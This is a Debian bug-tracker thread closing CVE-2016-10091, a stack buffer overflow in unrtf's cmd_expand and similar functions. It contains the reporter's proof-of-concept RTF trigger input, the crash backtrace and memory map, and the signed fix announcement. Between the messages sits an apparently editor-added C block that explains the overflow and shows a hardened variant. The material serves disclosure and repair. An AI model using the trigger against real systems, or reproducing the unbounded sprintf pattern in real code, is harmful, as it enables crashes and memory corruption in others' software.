Your message dated Fri, 06 Jan 2017 23:32:13 +0000
with message-id <[email protected]>
and subject line Bug#849705: fixed in unrtf 0.21.5-3+deb8u1
has caused the Debian Bug report #849705,
regarding unrtf: CVE-2016-10091: stack-based buffer overflows in cmd_* functions
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
849705: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=849705
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: unrtf
Version: 0.21.9-clean-2
I've found a stack-based buffer overflow in unrtf 0.21.9 which affects three
functions: cmd_expand, cmd_emboss and cmd_engrave.
# convert.c
static int
cmd_expand (Word *w, int align, char has_param, int param) {
	char str[10];                      /* room for 9 digits + NUL, not for a minus sign */
	if (has_param) {
		/* Overflow: a 9-digit negative value (param/4 == -100000000) needs 11 bytes */
		sprintf(str, "%d", param/4);
		if (!param)
			attr_pop(ATTR_EXPAND);
		else
			attr_push(ATTR_EXPAND, str);
	}
	return FALSE;
}
Apparently writing a negative integer to the buffer can trigger the overflow
(the minus sign needs an extra byte).
* How to trigger the bug *
$ echo "\expnd-400000000" > poc
$ unrtf poc
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
*** buffer overflow detected ***: unrtf terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
/lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
/lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
/lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
/lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
/lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
/lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
unrtf[0x804c7b8]
unrtf[0x804f77d]
unrtf[0x804f9e7]
unrtf[0x804920b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
unrtf[0x804953c]
======= Memory map: ========
08048000-0805b000 r-xp 00000000 08:01 405354 /usr/bin/unrtf
0805b000-0805c000 r--p 00012000 08:01 405354 /usr/bin/unrtf
0805c000-0805d000 rw-p 00013000 08:01 405354 /usr/bin/unrtf
0805d000-08085000 rw-p 00000000 00:00 0
0952d000-0954e000 rw-p 00000000 00:00 0 [heap]
b75ca000-b75e6000 r-xp 00000000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e6000-b75e7000 r--p 0001b000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e7000-b75e8000 rw-p 0001c000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e8000-b7799000 r-xp 00000000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so
b7799000-b779b000 r--p 001b0000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so
b779b000-b779c000 rw-p 001b2000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so
b779c000-b779f000 rw-p 00000000 00:00 0
b77a3000-b77a6000 rw-p 00000000 00:00 0
b77a6000-b77a8000 r--p 00000000 00:00 0 [vvar]
b77a8000-b77aa000 r-xp 00000000 00:00 0 [vdso]
b77aa000-b77cc000 r-xp 00000000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77cc000-b77cd000 rw-p 00000000 00:00 0
b77cd000-b77ce000 r--p 00022000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77ce000-b77cf000 rw-p 00023000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
bf992000-bf9b3000 rw-p 00000000 00:00 0 [stack]
Aborted
* Test environment *
Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
libc6 2.24-8
Regards,
Amir
Sent with [ProtonMail](https://protonmail.com) Secure Email.
--- End Message ---
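The arithmetic behind the report above, as an added example (editor's code, not unrtf's): `char str[10]` holds nine digits plus the terminating NUL, so `param/4 == 100000000` fits exactly while `-100000000` (the PoC's `\expnd-400000000` divided by 4) needs an eleventh byte, which is what the FORTIFY `__sprintf_chk` abort in the backtrace catches. `expand_bytes_written()` measures what the original `sprintf` would write, and `cmd_expand_safe()` is a hardened rewrite that bounds the write with `snprintf`, sizes the buffer for `INT_MIN`, and reports truncation instead of trusting the input. The `expand_action` codes stand in for unrtf's `attr_push`/`attr_pop` calls; the probe values in `main` are constructed inputs, and none of the names below are unrtf's own.

```c
/* Added example: why unrtf's cmd_expand() overflows on "\expnd-400000000",
 * beside a hardened variant. Not unrtf code; attr_push/attr_pop are replaced
 * by a returned action code. Build: cc -std=c11 -Wall -Wextra expnd.c */
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define UNRTF_STR_SIZE 10                  /* char str[10] in the vulnerable cmd_expand() */
#define INT_DEC_BUF sizeof("-2147483648")  /* 12: worst case for "%d" of an int, NUL included */

/* Bytes the original sprintf(str, "%d", param/4) writes, NUL included.
 * snprintf(NULL, 0, ...) only measures; it writes nothing. */
size_t expand_bytes_written(int param) {
    return (size_t)snprintf(NULL, 0, "%d", param / 4) + 1;
}

/* True when the original 10-byte buffer is too small for this parameter.
 * Nine digits fit exactly (9 + NUL = 10); a leading minus sign makes 11. */
bool expand_overflows(int param) {
    return expand_bytes_written(param) > UNRTF_STR_SIZE;
}

typedef enum {
    EXPAND_NOOP,      /* no parameter: original returns without touching attributes */
    EXPAND_POP,       /* param == 0: original calls attr_pop(ATTR_EXPAND) */
    EXPAND_PUSH,      /* value formatted into out: original calls attr_push(ATTR_EXPAND, str) */
    EXPAND_TRUNCATED  /* value did not fit; hardened version refuses instead of overflowing */
} expand_action;

/* Hardened cmd_expand(): bounded write, truncation detected and reported. */
expand_action cmd_expand_safe(bool has_param, int param, char *out, size_t outlen) {
    if (!has_param)
        return EXPAND_NOOP;
    if (!param)
        return EXPAND_POP;
    int n = snprintf(out, outlen, "%d", param / 4);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen)
            out[0] = '\0';               /* never hand a truncated string onward */
        return EXPAND_TRUNCATED;
    }
    return EXPAND_PUSH;
}

/* Run the hardened version into an internal buffer of `outlen` bytes (capped
 * at INT_DEC_BUF) so the outcome for a given buffer size can be inspected. */
expand_action expand_result_for(int param, size_t outlen) {
    static char buf[INT_DEC_BUF];
    if (outlen > sizeof buf)
        outlen = sizeof buf;
    return cmd_expand_safe(true, param, buf, outlen);
}

/* The string the hardened version pushes for `param` with a right-sized
 * buffer, or "" when it declined (param == 0 or truncation). */
const char *expand_text(int param) {
    static char buf[INT_DEC_BUF];
    buf[0] = '\0';
    cmd_expand_safe(true, param, buf, sizeof buf);
    return buf;
}

int main(void) {
    /* Constructed probe values: a normal one, the largest 9-digit fit,
     * the reporter's PoC value, and the most negative int. */
    const int probes[] = { 36, 400000000, -400000000, INT_MIN };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int p = probes[i];
        printf("\\expnd%-12d -> \"%s\" needs %zu bytes: %s\n", p, expand_text(p),
               expand_bytes_written(p),
               expand_overflows(p) ? "OVERFLOWS char str[10]" : "fits");
    }
    return 0;
}
```

Note that the fix is not just a bigger buffer: `INT_DEC_BUF` covers every `int`, but the `snprintf` return check is what turns any future size mismatch into a refused attribute rather than a silent truncation or an overflow.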
--- Begin Message ---
Source: unrtf
Source-Version: 0.21.5-3+deb8u1
We believe that the bug you reported is fixed in the latest version of
unrtf, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Willi Mann <[email protected]> (supplier of updated unrtf package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 01 Jan 2017 19:50:41 +0100
Source: unrtf
Binary: unrtf
Architecture: source amd64
Version: 0.21.5-3+deb8u1
Distribution: stable
Urgency: medium
Maintainer: Willi Mann <[email protected]>
Changed-By: Willi Mann <[email protected]>
Description:
unrtf - RTF to other formats converter
Closes: 849705
Changes:
unrtf (0.21.5-3+deb8u1) stable; urgency=medium
.
* Add patch from upstream to fix CVE-2016-10091 (buffer overflow in various
cmd_ functions) closes: 849705
Checksums-Sha1:
b509b150de60c9ea4cd2924d3d0c72c7e80ed43c 1857 unrtf_0.21.5-3+deb8u1.dsc
c44ba70275788c1d47617f794e8a7ef40cc7d0a7 10988 unrtf_0.21.5-3+deb8u1.debian.tar.xz
4eb6408e75f074ebdd4553bf7c6edb5cef7232f7 44032 unrtf_0.21.5-3+deb8u1_amd64.deb
Checksums-Sha256:
e3411332e5d511682834157b2e9b2d84cb5a13212fb1efe3563160c7c1aab14c 1857 unrtf_0.21.5-3+deb8u1.dsc
0dbdd48df60e78b89f986961782ddf7f6dfdd329d78f466bdcce1fbbff5ef958 10988 unrtf_0.21.5-3+deb8u1.debian.tar.xz
d7c677d1d55ae92f320a7db1eefe7bbe43b247b6db360590187a087bcb0a07be 44032 unrtf_0.21.5-3+deb8u1_amd64.deb
Files:
3e9b9131efa684f034fe804d4c6f1e09 1857 text optional unrtf_0.21.5-3+deb8u1.dsc
69ad47869f3577110567de89ee81529c 10988 text optional unrtf_0.21.5-3+deb8u1.debian.tar.xz
e489a0afa8939a5322355bbea998104e 44032 text optional unrtf_0.21.5-3+deb8u1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

=vxM5
-----END PGP SIGNATURE-----
--- End Message ---